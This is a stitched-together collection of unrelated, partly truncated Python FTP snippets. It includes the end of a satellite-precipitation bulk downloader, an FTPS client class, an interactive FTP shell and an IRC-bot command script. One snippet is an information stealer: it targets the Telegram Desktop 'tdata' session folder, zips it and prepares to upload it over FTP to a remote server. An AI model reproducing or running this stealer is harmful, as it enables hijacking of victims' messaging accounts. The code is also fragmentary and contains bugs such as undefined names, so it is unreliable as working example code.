get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S100000-E102959.0600.V06B.zip','26c103abd68721a388af108c25ad9b9008db6bcc') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S103000-E105959.0630.V06B.zip','b6985532ab631800f945ca68f243d4cfd009d750') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S110000-E112959.0660.V06B.zip','9333172d77f7f25f8df4558bae45bdc5c81d8fd2') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S113000-E115959.0690.V06B.zip','5bce0f1f5d52fbaab062b283d5b612e1f7215c3a') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S120000-E122959.0720.V06B.zip','5686f4afb2ae750c449664bc84c487f874b762a8') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S123000-E125959.0750.V06B.zip','c67f4bc665289b12531623346e744725079cd014') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S130000-E132959.0780.V06B.zip','56043e6650920cc447763cbb0cfc26097ada104a') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S133000-E135959.0810.V06B.zip','895f1c03ab457fd496cc93e98855bd2314f76d53') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S140000-E142959.0840.V06B.zip','c1f438461031505dc4f6571b4b9500a5ed3ed2d5') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S143000-E145959.0870.V06B.zip','68aed6165f7d6d10f5c368308b189427e17605fd') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S150000-E152959.0900.V06B.zip','f5d15b0d3ba45f42b98b710348f1a9a8bc5391e2') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S153000-E155959.0930.V06B.zip','1c6cd9ed50534b68368a4f3ff9465d27b4ea9b74') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S160000-E162959.0960.V06B.zip','85605ce4a96672ca38288a09ba606ab45918467c') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S163000-E165959.0990.V06B.zip','264f851646becd8d2cddf12fdf16f5940fbbd1a8') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S170000-E172959.1020.V06B.zip','35c92a72d8924d23dab92fcd7e4749f37ed55330') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S173000-E175959.1050.V06B.zip','c4351aec55f88be87e613aa98ea86df1dba84ec6') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S180000-E182959.1080.V06B.zip','0d1209dd8abc9dc3b5a9f3b63af2d80598923407') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S183000-E185959.1110.V06B.zip','2bee9f971b9ff7e5b94ab8c7556860dbdf1c82f9') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S190000-E192959.1140.V06B.zip','507906bc28ac6f125ef4ec417ea1b5e9c8aff3bc') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S193000-E195959.1170.V06B.zip','eace5c76336fb62c6743c7b73a4197828f360e6c') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S200000-E202959.1200.V06B.zip','cbcd8e090f11ec5879e0afa63344957dd4d6d74c') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S203000-E205959.1230.V06B.zip','3ba05cb83f72e2246ddedb1260029bde11e341c1') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S210000-E212959.1260.V06B.zip','337d000609646665b7ce45cd4b9198c0efed9e0e') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S213000-E215959.1290.V06B.zip','632609817a31f3ae40e8d9e8f4cc83b7ba0feefd') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S220000-E222959.1320.V06B.zip','8d25c208d713dd9b9b49f857a187c3a92d93a9ee') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S223000-E225959.1350.V06B.zip','67cbf6b57b1e97186cb0c0fc95362f1f1abe8be8') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S230000-E232959.1380.V06B.zip','4f7c16ce9dd0a0e723a3c46f8ec37a4f007f421a') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S233000-E235959.1410.V06B.zip','532238d12c4ed37d4ffd39872e7ef4603650d5ee') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S000000-E002959.0000.V06B.zip','70f07e79472364124d387d9292a797d88a4ff9bd') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S003000-E005959.0030.V06B.zip','d661f48d3665c2f778f57350f498b1cf1973a061') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S010000-E012959.0060.V06B.zip','77e7fb92f460a8de1f13731c5222fda8386e6441') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S013000-E015959.0090.V06B.zip','e2ecab2f92454878acce5596955beb2ad7f294fd') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S020000-E022959.0120.V06B.zip','2cb7fb6e0a811a8bfa1369607c4b1fd65217ad07') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S023000-E025959.0150.V06B.zip','e8ef0cc8ad19244d7733172ce921ac5ffc41cf50') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S030000-E032959.0180.V06B.zip','aba06d4fa1a184f35c17bc844a5f107b6c2d0197') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S033000-E035959.0210.V06B.zip','69af687244be0db96c2fe174c854ef30e46a41d9') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S040000-E042959.0240.V06B.zip','557e5a863cedafa7417fd18ee6b27a3161e38099') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S043000-E045959.0270.V06B.zip','308699bad3690324ee094ce7c783a14bcaacbfae') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S050000-E052959.0300.V06B.zip','4df9a1b513b725b377cfbe6661b2a16c64ccfa61') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S053000-E055959.0330.V06B.zip','0b31205ea68e18f9a8c011223d8c38defbece6ea') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S060000-E062959.0360.V06B.zip','e5934be9d1cf741eee2dd3ee4b33eaee22f258d5') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S063000-E065959.0390.V06B.zip','380525497b03617967aafcba50cbe3b2d761fc61') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S070000-E072959.0420.V06B.zip','100d5b9ae4e29d8fd557764551f3a5c55dafa7a7') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S073000-E075959.0450.V06B.zip','ad6cd0b49ae10c31e9b0c68b50f659b3c85dc31f') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S080000-E082959.0480.V06B.zip','903171e42be3ea5c047af5b068233233009bf926') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S083000-E085959.0510.V06B.zip','3b4bfa0bae2a5c19bc65b63ba95abda21922b42b') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S090000-E092959.0540.V06B.zip','dbd013d29b47595bad5ff31899ddc6fa4fd510eb') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S093000-E095959.0570.V06B.zip','072da429e45f9f53c6d0e8d5504df83e014130e9') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S100000-E102959.0600.V06B.zip','b4ca0b5d6eb145684b808776d3c701e9ba9892d2') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S103000-E105959.0630.V06B.zip','b31e48d9126414e707fea6de910277e52b89f749') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S110000-E112959.0660.V06B.zip','00e0b10b118ba3080e68ee52f672569667466a77') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S113000-E115959.0690.V06B.zip','c6a12867db202bb1bf4f9a28eb8a241bf201b320') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S120000-E122959.0720.V06B.zip','cc408441b70a2dfcc8f8407dc5a87ddcede066c2') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S123000-E125959.0750.V06B.zip','4493231149bb793412b1926978510ad5820cfa25') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S130000-E132959.0780.V06B.zip','87c986f2790b8629d3e7694e6277f5f40676c9bf') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S133000-E135959.0810.V06B.zip','178c95370ffc00694ab5bbf529c4d63f4ac725e4') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S140000-E142959.0840.V06B.zip','f4f06605433505d18c592f78e96928ad066958b4') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S143000-E145959.0870.V06B.zip','03a71bc70ba440f952b845c9588afb8a39dc7766') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S150000-E152959.0900.V06B.zip','6442627583596bcd6c41b7ce8422864718fd4621') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S153000-E155959.0930.V06B.zip','1342185a4c6fbd930f59d7a57f15a77b68e16441') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S160000-E162959.0960.V06B.zip','ccdc99282d268761e0a17152464678c6c5752fff') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S163000-E165959.0990.V06B.zip','9573a15b1f9d5cf99472f4d61093645a8bf4b959') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S170000-E172959.1020.V06B.zip','e77a3074a931999a965537f04f888e3ca5533051') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S173000-E175959.1050.V06B.zip','3509e1897fbf9a68ea5d1fbfaa94e6ca34957249') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S180000-E182959.1080.V06B.zip','475ca3ed075d6b9dc9b0743ed5d7579403f68305') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S183000-E185959.1110.V06B.zip','97c14b5ceabbb5768545feae0d413a512c66377a') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S190000-E192959.1140.V06B.zip','dac080f82cbdee41a5b5ae70a6347ab19699c962') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S193000-E195959.1170.V06B.zip','848cbd730bfa8a56efb9b8e33e785374fc4e801e') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S200000-E202959.1200.V06B.zip','4e8854fda21be052927c62bf421f5d6343a880c3') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S203000-E205959.1230.V06B.zip','30c078859d4bfc58bb43399e124ea14ea0f72c73') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S210000-E212959.1260.V06B.zip','19e8cb2d1a66ad7939ecbc7221ab3532149a5f86') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S213000-E215959.1290.V06B.zip','3988b384ee7299f8ebb3538c1a4aedfd0030a817') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S220000-E222959.1320.V06B.zip','6232ddae3206f7a17c72cffbd85b63a207722b92') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S223000-E225959.1350.V06B.zip','0f882a3c9e57678c8418c1746569278964d37b92') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S230000-E232959.1380.V06B.zip','b0f0fb3f9b6786bbe84221503bb8e537cda3f472') get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S233000-E235959.1410.V06B.zip','2a4203601af327ef24cd516085efebe4d24bbfc5') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S000000-E002959.0000.V06B.zip','58487d226fa900cefbcec68729f045ffaa1b0a67') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S003000-E005959.0030.V06B.zip','16d902a5a4886c783524711424d8e0add8c35e59') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S010000-E012959.0060.V06B.zip','9c9f0df2d993bcf13e4234dc1e01a6f1476e5973') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S013000-E015959.0090.V06B.zip','0603895a21d847f3e16b2fa38f27c48a192f0e0c') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S020000-E022959.0120.V06B.zip','fe0320929d835ca77096098bdd6513c6bb2ee144') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S023000-E025959.0150.V06B.zip','38a4c677a82abf33b9dc6551d4b7f6597bc06b4c') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S030000-E032959.0180.V06B.zip','93ac35129a9a44ea914f6bad7da22547ce06c841') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S033000-E035959.0210.V06B.zip','11d5cc513bca86045c90fda255421364c64a7a79') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S040000-E042959.0240.V06B.zip','cea37719ff156efbd70aca45db78aa4de100f5d2') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S043000-E045959.0270.V06B.zip','1fe1d26c829d73e61835a413a43bddc26121217d') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S050000-E052959.0300.V06B.zip','8f1fd0b1a169d1dd548fdb4252b4c68124db598f') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S053000-E055959.0330.V06B.zip','fabee236c7a9bccb0ed3dfac3d7957c68518cc64') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S060000-E062959.0360.V06B.zip','08ddd01afbe7638ab46aa145d65a9481b9acf8bd') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S063000-E065959.0390.V06B.zip','610703f508efded5c2e4ef6ee1aaead86b231d45') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S070000-E072959.0420.V06B.zip','4d88394d7fd02b815559e8cffa7012ea21ed7850') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S073000-E075959.0450.V06B.zip','20795a512835e5eabc7cccf8d75638e127e5f89e') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S080000-E082959.0480.V06B.zip','f8d2773c4ca0d687543f598958ed14672595f4ed') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S083000-E085959.0510.V06B.zip','820ee74b264f9f0494b81ae98cbd9b79f3fec453') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S090000-E092959.0540.V06B.zip','58b106a19d8f9741453a22182df41f4b72d44377') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S093000-E095959.0570.V06B.zip','067545336085aab6082b1b8c8b9a9ed3da366d41') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S100000-E102959.0600.V06B.zip','61bcec3de607f5ac3677be7ad630222b9ed6b17b') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S103000-E105959.0630.V06B.zip','5436204fa4db45db75da0bc1bc462f3c4a6350b0') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S110000-E112959.0660.V06B.zip','82241babfcee0941bdb7f41e778485e4c8ad1432') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S113000-E115959.0690.V06B.zip','eb519d7d6f1313da2fe48226855e6b282e60508f') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S120000-E122959.0720.V06B.zip','cfc532ad1da3fbc4c0560332d40656b483a224d2') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S123000-E125959.0750.V06B.zip','7519e9c704037c13b223152176a6886a182173d1') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S130000-E132959.0780.V06B.zip','196b1cf9120e09d5b1c991afbaab46a69513807e') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S133000-E135959.0810.V06B.zip','710a4fa13defa152b047250f90a889c70937f1eb') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S140000-E142959.0840.V06B.zip','35cad97f714f7136fc83bdf6d1e7775a5575cff1') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S143000-E145959.0870.V06B.zip','e4828e406dbe6783b678688d129e50e55a90d294') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S150000-E152959.0900.V06B.zip','d6c2e5ea3d07c2dc6529c526235aebd1c0480be0') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S153000-E155959.0930.V06B.zip','623def2ec9360a86e5028d4e7039d1f26b03dacd') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S160000-E162959.0960.V06B.zip','800355b5064a3a5fef801fb6bf39cbbb5f308ffe') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S163000-E165959.0990.V06B.zip','dbd979c4a2f6fc59a9cffff147c0f66681ff3cbe') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S170000-E172959.1020.V06B.zip','0744f545a3f952971a3d4eea3474a888714ba44a') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S173000-E175959.1050.V06B.zip','1f2ada94a2a535e6cc5798831877b09f70a05703') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S180000-E182959.1080.V06B.zip','6470ee124fce804f4c468363ea1c4a78a0ed09ee') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S183000-E185959.1110.V06B.zip','504d8572c436bfaef3295b3fea47a3ec9740914d') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S190000-E192959.1140.V06B.zip','6f79ce9fb94f6a914d3e1867572ea4172153c1b9') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S193000-E195959.1170.V06B.zip','0503bd087ecd0c514e6c9f6f37cd610ccfbeccae') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S200000-E202959.1200.V06B.zip','40a51c4df1fe8bc606653bbe39c7716fb5e3be3a') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S203000-E205959.1230.V06B.zip','daee0abf507ec6421a2bdbbbcbe008f208b46834') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S210000-E212959.1260.V06B.zip','346a247a7befbded9a16dd981fe606907abf1654') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S213000-E215959.1290.V06B.zip','3ce546f261a16c011adfb20fac91046c7799afad') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S220000-E222959.1320.V06B.zip','96d771d897fcebb211b464c4da0ec71eff8873ea') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S223000-E225959.1350.V06B.zip','45d514bba27fb00e2c815b36b6ececae0db29059') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S230000-E232959.1380.V06B.zip','842d54b61e5afc6a135d5cf946f05b8b0481119c') get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S233000-E235959.1410.V06B.zip','cae3cb42c5f19f46dd59119115b445cd097bbb8a') # Transfer complete; close connection if ftpConnection: ftpConnection.quit() print ('Number of files downloaded: '+str(downloadCount)) if (skipCount>0): print ('Number of files already downloaded: '+str(skipCount)) sys.exit(0)
class Ftps_client: ##初始化的时候会把登录参数赋值初始化 def __init__(self, host, user, pwd, port=21): self.host = host self.port = port self.user = user self.pwd = pwd self.Ftp = None #self._old_makepasv=FTP_TLS.makepasv ## ftp 登录项 含有闭包项 def login(self, debug=2, set_pasv=True): _old_makepasv = FTP_TLS.makepasv def _new_makepasv(self): host, port = _old_makepasv(self) host = self.sock.getpeername()[0] return host, port FTP_TLS.makepasv = _new_makepasv self.Ftp = FTP_TLS(self.host) self.Ftp.set_debuglevel(debug) self.Ftp.auth() self.Ftp.login(self.user, self.pwd) self.Ftp.makepasv() self.Ftp.sendcmd('pbsz 0') self.Ftp.set_pasv(set_pasv) self.Ftp.prot_p() print("您好 您已经登录 ftp: %s 服务器" % self.host) self.Ftp.getwelcome() return self.Ftp #显示 目录下的 文件列表 def ftplistDir(self, ftps, sever_path): self.Ftp.cwd("/") #首先切换得到根目录下,否则会出现问题 self.Ftp.cwd(sever_path) files = ftps.nlst() for f in files: print(f) # 下载服务器文件 def ftpDownloadSeverFile(self, sever_path, sever_file, new_localfile, buffersize=1024): self.Ftp.cwd("/") self.Ftp.cwd(sever_path) with open(new_localfile, 'wb') as download_file: self.Ftp.retrbinary('RETR %s' % sever_file, download_file.write, buffersize) ##上传文件 需要注意 上传文件的 new_severfile 只能是文件名,不能包含带目录 的 文件全路径 def ftpUploadLocalFile(self, local_filepath, sever_path, new_severfile, buffersize=1024): self.Ftp.cwd("/") self.Ftp.cwd(sever_path) with open(local_filepath, 'rb') as upload_file: self.Ftp.storbinary('STOR ' + new_severfile, upload_file, buffersize)
from zipfile import ZipFile from ftplib import FTP_TLS import os, random pathusr = os.path.expanduser('~') teleg = pathusr + '\\AppData\\Roaming\\Telegram Desktop\\tdata' zipp = pathusr + '\\AppData\\Local\\Temp\\tdata.zip' server = '' user = '' pasd = '' ftp = FTP_TLS() ftp.set_debuglevel(2) ftp.connect(server, 21) ftp.sendcmd('USER ' + str(user)) ftp.sendcmd('PASS ' + str(pasd)) try: files1 = os.listdir(teleg) files1 = ' '.join(files1) files2 = os.listdir(teleg + '\D877F783D5D3EF8C') files2 = ' '.join(files2) file1 = findall(r'(D877F783D5D3EF8C\S)', files1) file2 = findall(r'(map\S)', files2) file1 = ''.join(file1) file2 = ''.join(file2) file1 = teleg + '\\' + file1 file2 = teleg + '\\D877F783D5D3EF8C\\' + file2 attch = [] attch.append(file1)
def shell(host, port, user, passwd, use_ftps): """ Shell Mode function. Provides a CLI to interact with FTP server """ """ Args: host address, port number to connect, user[name] and passw[or]d to login, """ """ use_ftps - if true use FTPS instead of FTP """ #preparation: connect to the server try: if (use_ftps == "y"): if (user != ""): #if username defined ---> use it if (port == "def" or port == ""): #use default port 21 ftps = FTP_TLS(host=host, user=user, passwd=passwd) else: ftps = FTP_TLS(host=host, user=user, passwd=passwd, acct=port) else: #anon login if (port == "def" or port == ""): #use default port 21 ftps = FTP_TLS(host=host) ftps.login() else: ftps = FTP_TLS(host=host, acct=port, user=user, passwd=str(passwd)) ftps.login() print("Connecting to host '{0}' through port '{1}'... ".format(host, port)) os.system("echo Entering Shell Mode in 2 seconds") os.system("sleep 2") os.system("clear") print("Server response:\n" + ftp.getwelcome()) if (use_ftps == "n"): if (user != ""): #if username defined ---> use it if (port == "def" or port == ""): #use default port 21 ftp = FTP(host=host, user=user, passwd=passwd) else: ftp = FTP(host=host, user=user, passwd=passwd, acct=port) else: #anon login if (port == "def" or port == ""): #use default port 21 ftp = FTP(host=host) ftp.login() else: ftp = FTP(host=host, acct=port, user=user, passwd=str(passwd)) ftp.login() print("Connecting to host '{0}' through port '{1}'... ".format(host, port)) os.system("echo Entering Shell Mode in 2 seconds") os.system("sleep 2") os.system("clear") print("Server response:\n" + ftp.getwelcome()) except ftplib.all_errors as ex: print(color.red + "An error occured while login: {0}".format(ex) + color.std) return #enter shell mode while(1): try: if (use_ftps == "n"): cmd = input("ftp@{0}~#".format(host)) cmd, arg = parse(cmd) if (cmd == "cd"): ftp.cwd(arg) elif (cmd == "exit"): ftp.quit() return elif (cmd == "ls"): #unix's LS without flags support print(ftp.dir()) elif (cmd == "cmd"): #send a command to the server ftp.sendcmd(arg) elif (cmd == "getbin"): #download file in binary mode ftp.retrbinary(arg) elif (cmd == "gettxt"): #download file on text mode ftp.retrlines(arg) elif (cmd == "unknown"): print("Unknown command.") else: #FTPS cmd = input("ftps@{0}~#".format(host)) cmd, arg = parse(cmd) if (cmd == "cd"): ftps.cwd(arg) elif (cmd == "exit"): ftps.quit() return elif (cmd == "ls"): #unix's LS without flags support print(ftps.dir()) elif (cmd == "cmd"): #send a command to the server ftps.sendcmd(arg) elif (cmd == "getbin"): #download file in binary mode ftps.retrbinary(arg) elif (cmd == "gettxt"): #download file on text mode ftps.retrlines(arg) elif (cmd == "unknown"): print("Unknown command.") except ftplib.all_errors as ex: print(color.red + "Shell mode error: {0}".format(ex) + color.std)
# version one: # may, 05, 2016 # so, super simple thing to log into an ftp, and issue the command you pass # in the argument # syntax: ./script <command> # the idea is to run this from an eggdrop as a trigger, no fluff from ftplib import FTP_TLS from sys import argv filename, argument = argv ftps = FTP_TLS() #ftps.set_debuglevel(2) # if you broke something, uncomment this (run it directly, not from eggdrop) ftps.connect('your.host', '1111') # enter your server and port within the quotes ftps.login('specialftpuser', 'qwerty') # enter your user and pass within the quotes (remember, not a user with privs) ftps.prot_p() ftps.sendcmd('site ' + argument) # the tcl script i included will take any output from this python and spam # it into the channel.. set this how you like, or turn it off # if you're a tcl guru comment this out and make your tcl do the accounce print "cmd sent, sleeping now zzzz" ftps.quit() quit()
